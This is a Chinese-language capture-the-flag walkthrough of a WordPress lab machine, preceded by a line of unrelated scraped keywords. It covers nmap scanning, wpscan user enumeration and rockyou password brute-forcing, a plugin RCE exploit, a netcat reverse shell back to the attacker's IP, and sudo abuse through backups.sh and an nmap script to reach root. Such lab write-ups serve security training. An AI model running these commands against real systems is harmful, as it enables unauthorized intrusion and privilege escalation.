拐角型布局网站,电商网站分析,dede 手机网站,建设美食网站的作用攻击机192.168.223.128 靶机192.168.223.134 主机发现:nmap -sP 192.168.223.0/24
端口扫描 nmap -sV -p- -A 192.168.223.134
开启了22 80端口#xff0c;80是apache 2.4.25 先进入web界面看一下 用ip进不去#xff0c;应该被重定向到wordy.com vim /etc/hosts 加上 19…攻击机192.168.223.128 靶机192.168.223.134 主机发现:nmap -sP 192.168.223.0/24
端口扫描 nmap -sV -p- -A 192.168.223.134
开启了22 80端口80是apache 2.4.25 先进入web界面看一下 用ip进不去应该被重定向到wordy.com vim /etc/hosts 加上 192.168.223.134 wordy
又是一个WP CMS用wpscan搜一下漏洞
wpscan --url http://wordy/ 并没有扫到什么东西。 界面看了一下也没有什么有用信息扫一下目录dirsearch -u http://wordy/
好像只有登录有用
用户名用wpscan枚举一下
wpscan --url http://wordy -e u有admin,sarah graham mark jens五个账户 保存到一个user字典 但是密码用什么字典呢苦想了半天没找到线索看了别人wp原来题目描述的时候有个clue 提示要用rockyou.txt这个字典用wpscan爆破一下
wpscan --url http://wordy -U user.txt -P /usr/share/wordlists/rockyou.txt这个字典我没解压解压一下
gzip -d rockyou.txt.gz爆破时候我才注意到字典太大了忘记提示里面有个操作
这样生成了一个简单点的字典 再爆破wpscan --url http://wordy -U user.txt -P passwords.txt
爆破出来一组密码 mark helpdesk01 登录后台发现 这个wp用了一个插件 activity monitor
搜一下这插件有没有漏洞
searchsploit activity monitor用50110.py这个rce
拿到shell 这个不太稳定我们再反弹到攻击机上 攻击机开个监听nc -lvvp 4567 目标及执行 nc -e /bin/bash 192.168.223.128 4567
然后再切换到交互shell
python -c import pty; pty.spawn(/bin/bash)mark里面有个txt文件
告诉了我们graham的密码GSo7isUM1D4
su到graham 看一下权限sudo -l
jens可以免密执行 backups.sh 看一眼backups.sh里面是什么
里面内容是对网站根目录打包 将/bin/bash写入backups.sh然后用jens免密root执行backups.sh就能拿到root shell
echo “/bin/bash” /home/jens/backups.sh
sudo -u jens ./backups.sh成功拿到jens的shell
看一下有没有免密root的文件
nmap可以免密root执行 nmap是可以执行脚本的我们将shell写入脚本nmap执行脚本的时候我们就能拿到rootshell
echo os.execute(/bin/sh) shell
sudo nmap --scriptshell拿到root权限
拿到flag。
